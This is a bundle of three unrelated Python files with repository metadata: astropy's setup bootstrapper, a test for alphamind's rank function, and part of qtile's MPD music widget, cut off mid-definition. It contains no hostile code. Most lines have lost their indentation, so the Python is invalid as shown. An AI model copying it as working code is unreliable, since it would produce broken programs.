# otherwise the latest setuptools will be downloaded and bootstrapped with
# ``ez_setup.py``. This used to be included in a separate file called
# setuptools_bootstrap.py; but it was combined into ah_bootstrap.py
try:
import pkg_resources
_setuptools_req = pkg_resources.Requirement.parse('setuptools>=0.7')
# This may raise a DistributionNotFound in which case no version of
# setuptools or distribute is properly installed
_setuptools = pkg_resources.get_distribution('setuptools')
if _setuptools not in _setuptools_req:
# Older version of setuptools; check if we have distribute; again if
# this results in DistributionNotFound we want to give up
_distribute = pkg_resources.get_distribution('distribute')
if _setuptools != _distribute:
# It's possible on some pathological systems to have an old version
# of setuptools and distribute on sys.path simultaneously; make
# sure distribute is the one that's used
sys.path.insert(1, _distribute.location)
_distribute.activate()
imp.reload(pkg_resources)
except:
# There are several types of exceptions that can occur here; if all else
# fails bootstrap and use the bootstrapped version
from ez_setup import use_setuptools
use_setuptools()
# typing as a dependency for 1.6.1+ Sphinx causes issues when imported after
# initializing submodule with ah_bootstrap.py
# See discussion and references in
# https://github.com/astropy/astropy-helpers/issues/302
try:
import typing # noqa
except ImportError:
pass
# Note: The following import is required as a workaround to
# https://github.com/astropy/astropy-helpers/issues/89; if we don't import this
# module now, it will get cleaned up after `run_setup` is called, but that will
# later cause the TemporaryDirectory class defined in it to stop working when
# used later on by setuptools
try:
import setuptools.py31compat # noqa
except ImportError:
pass
# matplotlib can cause problems if it is imported from within a call of
# run_setup(), because in some circumstances it will try to write to the user's
# home directory, resulting in a SandboxViolation. See
# https://github.com/matplotlib/matplotlib/pull/4165
# Making sure matplotlib, if it is available, is imported early in the setup
# process can mitigate this (note importing matplotlib.pyplot has the same
# issue)
try:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot
except:
# Ignore if this fails for *any* reason
pass
# End compatibility imports...
# In case it didn't successfully import before the ez_setup checks
import pkg_resources
from setuptools import Distribution
from setuptools.package_index import PackageIndex
from distutils import log
from distutils.debug import DEBUG
# TODO: Maybe enable checking for a specific version of astropy_helpers?
DIST_NAME = 'astropy-helpers'
PACKAGE_NAME = 'astropy_helpers'
if PY3:
UPPER_VERSION_EXCLUSIVE = None
else:
UPPER_VERSION_EXCLUSIVE = '3'
# Defaults for other options
DOWNLOAD_IF_NEEDED = True
INDEX_URL = 'https://pypi.python.org/simple'
USE_GIT = True
OFFLINE = False
AUTO_UPGRADE = True
# A list of all the configuration options and their required types
CFG_OPTIONS = [
('auto_use', bool), ('path', str), ('download_if_needed', bool),
('index_url', str), ('use_git', bool), ('offline', bool),
('auto_upgrade', bool)
]
class _Bootstrapper(object):
"""
Bootstrapper implementation. See ``use_astropy_helpers`` for parameter
documentation.
"""
def __init__(self, path=None, index_url=None, use_git=None, offline=None,
download_if_needed=None, auto_upgrade=None):
if path is None:
path = PACKAGE_NAME
if not (isinstance(path, _str_types) or path is False):
raise TypeError('path must be a string or False')
if PY3 and not isinstance(path, _text_type):
fs_encoding = sys.getfilesystemencoding()
path = path.decode(fs_encoding) # path to unicode
self.path = path
# Set other option attributes, using defaults where necessary
self.index_url = index_url if index_url is not None else INDEX_URL
self.offline = offline if offline is not None else OFFLINE
# If offline=True, override download and auto-upgrade
if self.offline:
download_if_needed = False
auto_upgrade = False
self.download = (download_if_needed
if download_if_needed is not None
else DOWNLOAD_IF_NEEDED)
self.auto_upgrade = (auto_upgrade
if auto_upgrade is not None else AUTO_UPGRADE)
# If this is a release then the .git directory will not exist so we
# should not use git.
git_dir_exists = os.path.exists(os.path.join(os.path.dirname(__file__), '.git'))
if use_git is None and not git_dir_exists:
use_git = False
self.use_git = use_git if use_git is not None else USE_GIT
# Declared as False by default--later we check if astropy-helpers can be
# upgraded from PyPI, but only if not using a source distribution (as in
# the case of import from a git submodule)
self.is_submodule = False
@classmethod
def main(cls, argv=None):
if argv is None:
argv = sys.argv
config = cls.parse_config()
config.update(cls.parse_command_line(argv))
auto_use = config.pop('auto_use', False)
bootstrapper = cls(**config)
if auto_use:
# Run the bootstrapper, otherwise the setup.py is using the old
# use_astropy_helpers() interface, in which case it will run the
# bootstrapper manually after reconfiguring it.
bootstrapper.run()
return bootstrapper
@classmethod
def parse_config(cls):
if not os.path.exists('setup.cfg'):
return {}
cfg = ConfigParser()
try:
cfg.read('setup.cfg')
except Exception as e:
if DEBUG:
raise
log.error(
"Error reading setup.cfg: {0!r}\n{1} will not be "
"automatically bootstrapped and package installation may fail."
"\n{2}".format(e, PACKAGE_NAME, _err_help_msg))
return {}
if not cfg.has_section('ah_bootstrap'):
return {}
config = {}
for option, type_ in CFG_OPTIONS:
if not cfg.has_option('ah_bootstrap', option):
continue
if type_ is bool:
value = cfg.getboolean('ah_bootstrap', option)
else:
value = cfg.get('ah_bootstrap', option)
config[option] = value
return config
@classmethod
def parse_command_line(cls, argv=None):
if argv is None:
argv = sys.argv
config = {}
# For now we just pop recognized ah_bootstrap options out of the
# arg list. This is imperfect; in the unlikely case that a setup.py
# custom command or even custom Distribution class defines an argument
# of the same name then we will break that. However there's a catch22
# here that we can't just do full argument parsing right here, because
# we don't yet know *how* to parse all possible command-line arguments.
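# For example, ``python setup.py build --offline --no-git`` results in
# {'offline': True, 'use_git': False} here, leaving ``build`` in argv for
# setuptools to parse later.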
if '--no-git' in argv:
config['use_git'] = False
argv.remove('--no-git')
if '--offline' in argv:
config['offline'] = True
argv.remove('--offline')
if '--auto-use' in argv:
config['auto_use'] = True
argv.remove('--auto-use')
if '--no-auto-use' in argv:
config['auto_use'] = False
argv.remove('--no-auto-use')
if '--use-system-astropy-helpers' in argv:
config['auto_use'] = False
argv.remove('--use-system-astropy-helpers')
return config
def run(self):
strategies = ['local_directory', 'local_file', 'index']
dist = None
# First, remove any previously imported versions of astropy_helpers;
# this is necessary for nested installs where one package's installer
# is installing another package via setuptools.sandbox.run_setup, as in
# the case of setup_requires
for key in list(sys.modules):
try:
if key == PACKAGE_NAME or key.startswith(PACKAGE_NAME + '.'):
del sys.modules[key]
except AttributeError:
# Sometimes mysterious non-string things can turn up in
# sys.modules
continue
# Check to see if the path is a submodule
self.is_submodule = self._check_submodule()
for strategy in strategies:
method = getattr(self, 'get_{0}_dist'.format(strategy))
dist = method()
if dist is not None:
break
else:
raise _AHBootstrapSystemExit(
"No source found for the {0!r} package; {0} must be "
"available and importable as a prerequisite to building "
"or installing this package.".format(PACKAGE_NAME))
# This is a bit hacky, but if astropy_helpers was loaded from a
# directory/submodule its Distribution object gets a "precedence" of
# "DEVELOP_DIST". However, in other cases it gets a precedence of
# "EGG_DIST". However, when activing the distribution it will only be
# placed early on sys.path if it is treated as an EGG_DIST, so always
# do that
dist = dist.clone(precedence=pkg_resources.EGG_DIST)
# Otherwise we found a version of astropy-helpers, so we're done
# Just activate the found distribution on sys.path--if we did a
# download this usually happens automatically but it doesn't hurt to
# do it again
# Note: Adding the dist to the global working set also activates it
# (makes it importable on sys.path) by default.
try:
pkg_resources.working_set.add(dist, replace=True)
except TypeError:
# Some (much) older versions of setuptools do not have the
# replace=True option here. These versions are old enough that all
# bets may be off anyways, but it's easy enough to work around just
# in case...
if dist.key in pkg_resources.working_set.by_key:
del pkg_resources.working_set.by_key[dist.key]
pkg_resources.working_set.add(dist)
@property
def config(self):
"""
A `dict` containing the options this `_Bootstrapper` was configured
with.
"""
return dict((optname, getattr(self, optname))
for optname, _ in CFG_OPTIONS if hasattr(self, optname))
def get_local_directory_dist(self):
"""
Handle importing a vendored package from a subdirectory of the source
distribution.
"""
if not os.path.isdir(self.path):
return
log.info('Attempting to import astropy_helpers from {0} {1!r}'.format(
'submodule' if self.is_submodule else 'directory',
self.path))
dist = self._directory_import()
if dist is None:
log.warn(
'The requested path {0!r} for importing {1} does not '
'exist, or does not contain a copy of the {1} '
'package.'.format(self.path, PACKAGE_NAME))
elif self.auto_upgrade and not self.is_submodule:
# A version of astropy-helpers was found on the available path, but
# check to see if a bugfix release is available on PyPI
upgrade = self._do_upgrade(dist)
if upgrade is not None:
dist = upgrade
return dist
def get_local_file_dist(self):
"""
Handle importing from a source archive; this also uses setup_requires
but points easy_install directly to the source archive.
"""
if not os.path.isfile(self.path):
return
log.info('Attempting to unpack and import astropy_helpers from '
'{0!r}'.format(self.path))
try:
dist = self._do_download(find_links=[self.path])
except Exception as e:
if DEBUG:
raise
log.warn(
'Failed to import {0} from the specified archive {1!r}: '
'{2}'.format(PACKAGE_NAME, self.path, str(e)))
dist = None
if dist is not None and self.auto_upgrade:
# A version of astropy-helpers was found on the available path, but
# check to see if a bugfix release is available on PyPI
upgrade = self._do_upgrade(dist)
if upgrade is not None:
dist = upgrade
return dist
def get_index_dist(self):
if not self.download:
log.warn('Downloading {0!r} disabled.'.format(DIST_NAME))
return None
log.warn(
"Downloading {0!r}; run setup.py with the --offline option to "
"force offline installation.".format(DIST_NAME))
try:
dist = self._do_download()
except Exception as e:
if DEBUG:
raise
log.warn(
'Failed to download and/or install {0!r} from {1!r}:\n'
'{2}'.format(DIST_NAME, self.index_url, str(e)))
dist = None
# No need to run auto-upgrade here since we've already presumably
# gotten the most up-to-date version from the package index
return dist
def _directory_import(self):
"""
Import astropy_helpers from the given path, which will be added to
sys.path.
Returns the resulting Distribution object, or None if astropy_helpers
could not be imported from the given path.
"""
path = os.path.abspath(self.path)
# Use an empty WorkingSet rather than the main
# pkg_resources.working_set, since on older versions of setuptools this
# will invoke a VersionConflict when trying to install an upgrade
ws = pkg_resources.WorkingSet([])
ws.add_entry(path)
dist = ws.by_key.get(DIST_NAME)
if dist is None:
# We didn't find an egg-info/dist-info in the given path, but if a
# setup.py exists we can generate it
setup_py = os.path.join(path, 'setup.py')
if os.path.isfile(setup_py):
# We use subprocess instead of run_setup from setuptools to
# avoid segmentation faults - see the following for more details:
# https://github.com/cython/cython/issues/2104
sp.check_output([sys.executable, 'setup.py', 'egg_info'], cwd=path)
for dist in pkg_resources.find_distributions(path, True):
# There should be only one...
return dist
return dist
def _do_download(self, version='', find_links=None):
if find_links:
allow_hosts = ''
index_url = None
else:
allow_hosts = None
index_url = self.index_url
# Annoyingly, setuptools will not handle other arguments to
# Distribution (such as options) before handling setup_requires, so it
# is not straightforward to programmatically augment the arguments which
# are passed to easy_install
class _Distribution(Distribution):
def get_option_dict(self, command_name):
opts = Distribution.get_option_dict(self, command_name)
if command_name == 'easy_install':
if find_links is not None:
opts['find_links'] = ('setup script', find_links)
if index_url is not None:
opts['index_url'] = ('setup script', index_url)
if allow_hosts is not None:
opts['allow_hosts'] = ('setup script', allow_hosts)
return opts
if version:
req = '{0}=={1}'.format(DIST_NAME, version)
else:
if UPPER_VERSION_EXCLUSIVE is None:
req = DIST_NAME
else:
req = '{0}<{1}'.format(DIST_NAME, UPPER_VERSION_EXCLUSIVE)
attrs = {'setup_requires': [req]}
# NOTE: we need to parse the config file (e.g. setup.cfg) to make sure
# it honours the options set in the [easy_install] section, and we need
# to explicitly fetch the requirement eggs as setup_requires does not
# get honored in recent versions of setuptools:
# https://github.com/pypa/setuptools/issues/1273
try:
context = _verbose if DEBUG else _silence
with context():
dist = _Distribution(attrs=attrs)
try:
dist.parse_config_files(ignore_option_errors=True)
dist.fetch_build_eggs(req)
except TypeError:
# On older versions of setuptools, ignore_option_errors
# doesn't exist, and the above two lines are not needed
# so we can just continue
pass
# If the setup_requires succeeded it will have added the new dist to
# the main working_set
return pkg_resources.working_set.by_key.get(DIST_NAME)
except Exception as e:
if DEBUG:
raise
msg = 'Error retrieving {0} from {1}:\n{2}'
if find_links:
source = find_links[0]
elif index_url != INDEX_URL:
source = index_url
else:
source = 'PyPI'
raise Exception(msg.format(DIST_NAME, source, repr(e)))
def _do_upgrade(self, dist):
# Build up a requirement for a higher bugfix release but a lower minor
# release (so API compatibility is guaranteed)
next_version = _next_version(dist.parsed_version)
req = pkg_resources.Requirement.parse(
'{0}>{1},<{2}'.format(DIST_NAME, dist.version, next_version))
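# For example, with an installed astropy-helpers 2.0.3 the requirement
# built above is "astropy-helpers>2.0.3,<2.1.0" (see _next_version below),
# so only bugfix releases are considered for the upgrade.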
package_index = PackageIndex(index_url=self.index_url)
upgrade = package_index.obtain(req)
if upgrade is not None:
return self._do_download(version=upgrade.version)
def _check_submodule(self):
"""
Check if the given path is a git submodule.
See the docstrings for ``_check_submodule_using_git`` and
``_check_submodule_no_git`` for further details.
"""
if (self.path is None or
(os.path.exists(self.path) and not os.path.isdir(self.path))):
return False
if self.use_git:
return self._check_submodule_using_git()
else:
return self._check_submodule_no_git()
def _check_submodule_using_git(self):
"""
Check if the given path is a git submodule. If so, attempt to initialize
and/or update the submodule if needed.
This function makes calls to the ``git`` command in subprocesses. The
``_check_submodule_no_git`` option uses pure Python to check if the given
path looks like a git submodule, but it cannot perform updates.
"""
cmd = ['git', 'submodule', 'status', '--', self.path]
try:
log.info('Running `{0}`; use the --no-git option to disable git '
'commands'.format(' '.join(cmd)))
returncode, stdout, stderr = run_cmd(cmd)
except _CommandNotFound:
# The git command simply wasn't found; this is most likely the
# case on user systems that don't have git and are simply
# trying to install the package from PyPI or a source
# distribution. Silently ignore this case and simply don't try
# to use submodules
return False
stderr = stderr.strip()
if returncode != 0 and stderr:
# Unfortunately the return code alone cannot be relied on, as
# earlier versions of git returned 0 even if the requested submodule
# does not exist
# This is a warning that occurs in perl (from running git submodule)
# which only occurs with a malformatted locale setting which can
# happen sometimes on OSX. See again
# https://github.com/astropy/astropy/issues/2749
perl_warning = ('perl: warning: Falling back to the standard locale '
'("C").')
if not stderr.strip().endswith(perl_warning):
# Some other unknown error condition occurred
log.warn('git submodule command failed '
'unexpectedly:\n{0}'.format(stderr))
return False
# Output of `git submodule status` is as follows:
#
# 1: Status indicator: '-' for submodule is uninitialized, '+' if
# submodule is initialized but is not at the commit currently indicated
# in .gitmodules (and thus needs to be updated), or 'U' if the
# submodule is in an unstable state (i.e. has merge conflicts)
#
# 2. SHA-1 hash of the current commit of the submodule (we don't really
# need this information but it's useful for checking that the output is
# correct)
#
# 3. The output of `git describe` for the submodule's current commit
# hash (this includes for example what branches the commit is on) but
# only if the submodule is initialized. We ignore this information for
# now
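# Illustrative examples of lines the regex below is meant to match (hashes
# shortened here; real output contains 40 hex digits):
#   "-<sha1> astropy_helpers"                 -> uninitialized
#   "+<sha1> astropy_helpers (heads/master)"  -> initialized but out of date
#   " <sha1> astropy_helpers (v2.0.6)"        -> up to date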
_git_submodule_status_re = re.compile(
'^(?P<status>[+-U ])(?P<commit>[0-9a-f]{40}) '
'(?P<submodule>\S+)( .*)?$')
# The stdout should only contain one line--the status of the
# requested submodule
m = _git_submodule_status_re.match(stdout)
if m:
# Yes, the path *is* a git submodule
self._update_submodule(m.group('submodule'), m.group('status'))
return True
else:
log.warn(
'Unexpected output from `git submodule status`:\n{0}\n'
'Will attempt import from {1!r} regardless.'.format(
stdout, self.path))
return False
def _check_submodule_no_git(self):
"""
Like ``_check_submodule_using_git``, but simply parses the .gitmodules file
to determine if the supplied path is a git submodule, and does not exec any
subprocesses.
This can only determine if a path is a submodule--it does not perform
updates, etc. This function may need to be updated if the format of the
.gitmodules file is changed between git versions.
"""
gitmodules_path = os.path.abspath('.gitmodules')
if not os.path.isfile(gitmodules_path):
return False
# This is a minimal reader for gitconfig-style files. It handles a few of
# the quirks that make gitconfig files incompatible with ConfigParser-style
# files, but does not support the full gitconfig syntax (just enough
# needed to read a .gitmodules file).
gitmodules_fileobj = io.StringIO()
# Must use io.open for cross-Python-compatible behavior wrt unicode
with io.open(gitmodules_path) as f:
for line in f:
# gitconfig files are more flexible with leading whitespace; just
# go ahead and remove it
line = line.lstrip()
# comments can start with either # or ;
if line and line[0] in ('#', ';'):
continue
gitmodules_fileobj.write(line)
gitmodules_fileobj.seek(0)
cfg = RawConfigParser()
try:
cfg.readfp(gitmodules_fileobj)
except Exception as exc:
log.warn('Malformatted .gitmodules file: {0}\n'
'{1} cannot be assumed to be a git submodule.'.format(
exc, self.path))
return False
for section in cfg.sections():
if not cfg.has_option(section, 'path'):
continue
submodule_path = cfg.get(section, 'path').rstrip(os.sep)
if submodule_path == self.path.rstrip(os.sep):
return True
return False
def _update_submodule(self, submodule, status):
if status == ' ':
# The submodule is up to date; no action necessary
return
elif status == '-':
if self.offline:
raise _AHBootstrapSystemExit(
"Cannot initialize the {0} submodule in --offline mode; "
"this requires being able to clone the submodule from an "
"online repository.".format(submodule))
cmd = ['update', '--init']
action = 'Initializing'
elif status == '+':
cmd = ['update']
action = 'Updating'
if self.offline:
cmd.append('--no-fetch')
elif status == 'U':
raise _AHBootstrapSystemExit(
'Error: Submodule {0} contains unresolved merge conflicts. '
'Please complete or abandon any changes in the submodule so that '
'it is in a usable state, then try again.'.format(submodule))
else:
log.warn('Unknown status {0!r} for git submodule {1!r}. Will '
'attempt to use the submodule as-is, but try to ensure '
'that the submodule is in a clean state and contains no '
'conflicts or errors.\n{2}'.format(status, submodule,
_err_help_msg))
return
err_msg = None
cmd = ['git', 'submodule'] + cmd + ['--', submodule]
log.warn('{0} {1} submodule with: `{2}`'.format(
action, submodule, ' '.join(cmd)))
try:
log.info('Running `{0}`; use the --no-git option to disable git '
'commands'.format(' '.join(cmd)))
returncode, stdout, stderr = run_cmd(cmd)
except OSError as e:
err_msg = str(e)
else:
if returncode != 0:
err_msg = stderr
if err_msg is not None:
log.warn('An unexpected error occurred updating the git submodule '
'{0!r}:\n{1}\n{2}'.format(submodule, err_msg,
_err_help_msg))
class _CommandNotFound(OSError):
"""
An exception raised when a command run with run_cmd is not found on the
system.
"""
def run_cmd(cmd):
"""
Run a command in a subprocess, given as a list of command-line
arguments.
Returns a ``(returncode, stdout, stderr)`` tuple.
"""
try:
p = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE)
# XXX: May block if either stdout or stderr fill their buffers;
# however for the commands this is currently used for that is
# unlikely (they should have very brief output)
stdout, stderr = p.communicate()
except OSError as e:
if DEBUG:
raise
if e.errno == errno.ENOENT:
msg = 'Command not found: `{0}`'.format(' '.join(cmd))
raise _CommandNotFound(msg, cmd)
else:
raise _AHBootstrapSystemExit(
'An unexpected error occurred when running the '
'`{0}` command:\n{1}'.format(' '.join(cmd), str(e)))
# Can fail if the default locale is not configured properly. See
# https://github.com/astropy/astropy/issues/2749. For the purposes under
# consideration 'latin1' is an acceptable fallback.
try:
stdio_encoding = locale.getdefaultlocale()[1] or 'latin1'
except ValueError:
# Due to an OSX oddity locale.getdefaultlocale() can also crash
# depending on the user's locale/language settings. See:
# http://bugs.python.org/issue18378
stdio_encoding = 'latin1'
# Unlikely to fail at this point but even then let's be flexible
if not isinstance(stdout, _text_type):
stdout = stdout.decode(stdio_encoding, 'replace')
if not isinstance(stderr, _text_type):
stderr = stderr.decode(stdio_encoding, 'replace')
return (p.returncode, stdout, stderr)
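# --- Editor's illustrative sketch (not part of the original ah_bootstrap
# module): a minimal consumer of the (returncode, stdout, stderr) tuple
# returned by run_cmd. The `git --version` invocation is an arbitrary,
# harmless example command chosen purely for illustration.
def _demo_run_cmd():
    """Hypothetical helper showing how run_cmd results might be inspected."""
    returncode, stdout, stderr = run_cmd(['git', '--version'])
    if returncode != 0:
        # Non-zero return code: surface the captured stderr for debugging
        return 'git failed: {0}'.format(stderr.strip())
    return stdout.strip()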
def _next_version(version):
"""
Given a parsed version from pkg_resources.parse_version, returns a new
version string with the next minor version.
Examples
========
>>> _next_version(pkg_resources.parse_version('1.2.3'))
'1.3.0'
"""
if hasattr(version, 'base_version'):
# New version parsing from setuptools >= 8.0
if version.base_version:
parts = version.base_version.split('.')
else:
parts = []
else:
parts = []
for part in version:
if part.startswith('*'):
break
parts.append(part)
parts = [int(p) for p in parts]
if len(parts) < 3:
parts += [0] * (3 - len(parts))
major, minor, micro = parts[:3]
return '{0}.{1}.{2}'.format(major, minor + 1, 0)
class _DummyFile(object):
"""A noop writeable object."""
errors = '' # Required for Python 3.x
encoding = 'utf-8'
def write(self, s):
pass
def flush(self):
pass
@contextlib.contextmanager
def _verbose():
yield
@contextlib.contextmanager
def _silence():
"""A context manager that silences sys.stdout and sys.stderr."""
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = _DummyFile()
sys.stderr = _DummyFile()
exception_occurred = False
try:
yield
except:
exception_occurred = True
# Go ahead and clean up so that exception handling can work normally
sys.stdout = old_stdout
sys.stderr = old_stderr
raise
if not exception_occurred:
sys.stdout = old_stdout
sys.stderr = old_stderr
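# --- Editor's illustrative sketch (not part of the original module): the
# _silence context manager is meant to wrap chatty calls so that anything they
# print is swallowed by _DummyFile, for example:
def _demo_silence():
    """Hypothetical helper demonstrating the _silence context manager."""
    with _silence():
        print('this output is discarded while _silence is active')
    return 'done'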
_err_help_msg = """
If the problem persists consider installing astropy_helpers manually using pip
(`pip install astropy_helpers`) or by manually downloading the source archive,
extracting it, and installing by running `python setup.py install` from the
root of the extracted source code.
"""
class _AHBootstrapSystemExit(SystemExit):
def __init__(self, *args):
if not args:
msg = 'An unknown problem occurred bootstrapping astropy_helpers.'
else:
msg = args[0]
msg += '\n' + _err_help_msg
super(_AHBootstrapSystemExit, self).__init__(msg, *args[1:])
BOOTSTRAPPER = _Bootstrapper.main()
def use_astropy_helpers(**kwargs):
"""
Ensure that the `astropy_helpers` module is available and is importable.
This supports automatic submodule initialization if astropy_helpers is
included in a project as a git submodule, or will download it from PyPI if
necessary.
Parameters
----------
path : str or None, optional
A filesystem path relative to the root of the project's source code
that should be added to `sys.path` so that `astropy_helpers` can be
imported from that path.
If the path is a git submodule it will automatically be initialized
and/or updated.
The path may also be to a ``.tar.gz`` archive of the astropy_helpers
source distribution. In this case the archive is automatically
unpacked and made temporarily available on `sys.path` as a ``.egg``
archive.
If `None` skip straight to downloading.
download_if_needed : bool, optional
If the provided filesystem path is not found an attempt will be made to
download astropy_helpers from PyPI. It will then be made temporarily
available on `sys.path` as a ``.egg`` archive (using the
        ``setup_requires`` feature of setuptools). If the ``--offline`` option
is given at the command line the value of this argument is overridden
to `False`.
index_url : str, optional
If provided, use a different URL for the Python package index than the
main PyPI server.
use_git : bool, optional
If `False` no git commands will be used--this effectively disables
support for git submodules. If the ``--no-git`` option is given at the
command line the value of this argument is overridden to `False`.
auto_upgrade : bool, optional
By default, when installing a package from a non-development source
        distribution ah_bootstrap will try to automatically check for patch
releases to astropy-helpers on PyPI and use the patched version over
any bundled versions. Setting this to `False` will disable that
functionality. If the ``--offline`` option is given at the command line
the value of this argument is overridden to `False`.
    offline : bool, optional
        If `True`, disable all actions that require an internet connection,
        including downloading packages from the package index and fetching
        updates to any git submodule. Defaults to `False`.
"""
global BOOTSTRAPPER
config = BOOTSTRAPPER.config
config.update(**kwargs)
# Create a new bootstrapper with the updated configuration and run it
BOOTSTRAPPER = _Bootstrapper(**config)
BOOTSTRAPPER.run()
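# --- Editor's illustrative note (not part of the original file): a project's
# setup.py is assumed to invoke this module roughly as follows, where the
# 'astropy_helpers' path and the keyword arguments are project-specific
# placeholders --
#
#     from ah_bootstrap import use_astropy_helpers
#     use_astropy_helpers(path='astropy_helpers', auto_upgrade=False)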
| adrn/SFD | ah_bootstrap.py | Python | mit | 36,850 |
# -*- coding: utf-8 -*-
"""
Created on 2017-8-8
@author: cheng.li
"""
import unittest
import numpy as np
import pandas as pd
from alphamind.data.rank import rank
class TestRank(unittest.TestCase):
def setUp(self):
self.x = np.random.randn(1000, 1)
self.groups = np.random.randint(0, 10, 1000)
def test_rank(self):
data_rank = rank(self.x)
sorted_array = np.zeros_like(self.x)
for i in range(self.x.shape[0]):
for j in range(self.x.shape[1]):
sorted_array[int(data_rank[i, j]), j] = self.x[i, j]
arr_diff = np.diff(sorted_array, axis=0)
np.testing.assert_array_less(0, arr_diff)
def test_rank_with_groups(self):
data = pd.DataFrame(data={'raw': self.x.tolist()}, index=self.groups)
data['rank'] = rank(data['raw'].values, groups=data.index)
groups = dict(list(data['rank'].groupby(level=0)))
ret = []
for index in range(10):
ret.append(groups[index].values)
ret = np.concatenate(ret).reshape(-1, 1)
expected_rank = data['raw'].groupby(level=0).apply(
lambda x: x.values.argsort(axis=0).argsort(axis=0))
expected_rank = np.concatenate(expected_rank).reshape(-1, 1)
np.testing.assert_array_equal(ret, expected_rank)
| wegamekinglc/alpha-mind | alphamind/tests/data/test_rank.py | Python | mit | 1,317 |
# -*- coding: utf-8 -*-
# Copyright (c) 2010 matt
# Copyright (c) 2010 Dieter Plaetinck
# Copyright (c) 2010, 2012 roger
# Copyright (c) 2011-2012 Florian Mounier
# Copyright (c) 2011 Mounier Florian
# Copyright (c) 2011 Timo Schmiade
# Copyright (c) 2012 Mikkel Oscar Lyderik
# Copyright (c) 2012, 2014 Tycho Andersen
# Copyright (c) 2012 Craig Barnes
# Copyright (c) 2013 Tao Sauvage
# Copyright (c) 2013 Tom Hunt
# Copyright (c) 2014 Justin Bronder
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# depends on python-mpd
# TODO: check if UI hangs in case of network issues and such
# TODO: some kind of templating to make shown info configurable
# TODO: best practice to handle failures? just write to stderr?
from __future__ import division
import re
import time
import mpd
from .. import utils, pangocffi
from . import base
from libqtile.log_utils import logger
class Mpd(base.ThreadPoolText):
"""A widget for the Music Player Daemon (MPD)
Initialize the widget with the following parameters
Parameters
==========
host :
host to connect to
port :
port to connect to
password :
password to use
fmt_playing :
format string to display when playing/paused
fmt_stopped :
        format string to display when stopped
msg_nc :
which message to show when we're not connected
do_color_progress :
whether to indicate progress in song by altering message color
width :
A fixed width, or bar.CALCULATED to calculate the width automatically
(which is recommended).
"""
orientations = base.ORIENTATION_HORIZONTAL
defaults = [
("foreground_progress", "ffffff", "Foreground progress colour"),
('reconnect', False, 'attempt to reconnect if initial connection failed'),
('reconnect_interval', 1, 'Time to delay between connection attempts.'),
('update_interval', 0.5, 'Update Time in seconds.')
]
# TODO: have this use our config framework
def __init__(self, host='localhost', port=6600,
password=False, fmt_playing="%a - %t [%v%%]",
fmt_stopped="Stopped [%v%%]", msg_nc='Mpd off',
do_color_progress=True, **config):
super(Mpd, self).__init__(msg_nc, **config)
self.host = host
self.port = port
self.password = password
self.fmt_playing, self.fmt_stopped = fmt_playing, fmt_stopped
self.msg_nc = msg_nc
self.do_color_progress = do_color_progress
self.inc = 2
self.add_defaults(Mpd.defaults)
self.client = mpd.MPDClient()
self.connected = False
self.stop = False
def finalize(self):
self.stop = True
if self.connected:
try:
                # The volume setting is kind of a dirty trick. There doesn't
# seem to be a decent way to set a timeout for the idle
# command. Therefore we need to trigger some events such that
# if poll() is currently waiting on an idle event it will get
# something so that it can exit. In practice, I can't tell the
# difference in volume and hopefully no one else can either.
self.client.volume(1)
self.client.volume(-1)
self.client.disconnect()
except:
pass
base._Widget.finalize(self)
def connect(self, quiet=False):
if self.connected:
return True
try:
self.client.connect(host=self.host, port=self.port)
except Exception:
if not quiet:
logger.exception('Failed to connect to mpd')
return False
        if self.password:
            try:
                self.client.password(self.password)
            except Exception:
                logger.warning('Authentication failed. Disconnecting')
                try:
                    self.client.disconnect()
                except Exception:
                    pass
                # Authentication failed and we disconnected, so report failure
                # instead of marking the widget as connected.
                return False
        self.connected = True
        return True
def _configure(self, qtile, bar):
super(Mpd, self)._configure(qtile, bar)
self.layout = self.drawer.textlayout(
self.text,
self.foreground,
self.font,
self.fontsize,
self.fontshadow,
markup=True
)
def to_minutes_seconds(self, stime):
"""Takes an integer time in seconds, transforms it into
(HH:)?MM:SS. HH portion is only visible if total time is greater
than an hour.
"""
if type(stime) != int:
stime = int(stime)
mm = stime // 60
ss = stime % 60
if mm >= 60:
hh = mm // 60
mm = mm % 60
rv = "{}:{:02}:{:02}".format(hh, mm, ss)
else:
rv = "{}:{:02}".format(mm, ss)
return rv
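    # Editor's note (illustrative, not part of the original widget): with the
    # formatting above, to_minutes_seconds(125) yields '2:05' and
    # to_minutes_seconds(3725) yields '1:02:05'.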
def get_artist(self):
return self.song['artist']
def get_album(self):
return self.song['album']
def get_elapsed(self):
elapsed = self.status['time'].split(':')[0]
return self.to_minutes_seconds(elapsed)
def get_file(self):
return self.song['file']
def get_length(self):
return self.to_minutes_seconds(self.song['time'])
def get_number(self):
return str(int(self.status['song']) + 1)
def get_playlistlength(self):
return self.status['playlistlength']
def get_status(self):
n = self.status['state']
if n == "play":
return "->"
elif n == "pause":
return "||"
elif n == "stop":
return "[]"
def get_longstatus(self):
n = self.status['state']
if n == "play":
return "Playing"
elif n == "pause":
return "Paused"
elif n == "stop":
return "Stopped"
def get_title(self):
return self.song['title']
def get_track(self):
# This occasionally has leading zeros we don't want.
return str(int(self.song['track'].split('/')[0]))
def get_volume(self):
return self.status['volume']
def get_single(self):
if self.status['single'] == '1':
return '1'
else:
return '_'
def get_repeat(self):
if self.status['repeat'] == '1':
return 'R'
else:
return '_'
def get_shuffle(self):
if self.status['random'] == '1':
return 'S'
else:
return '_'
formats = {
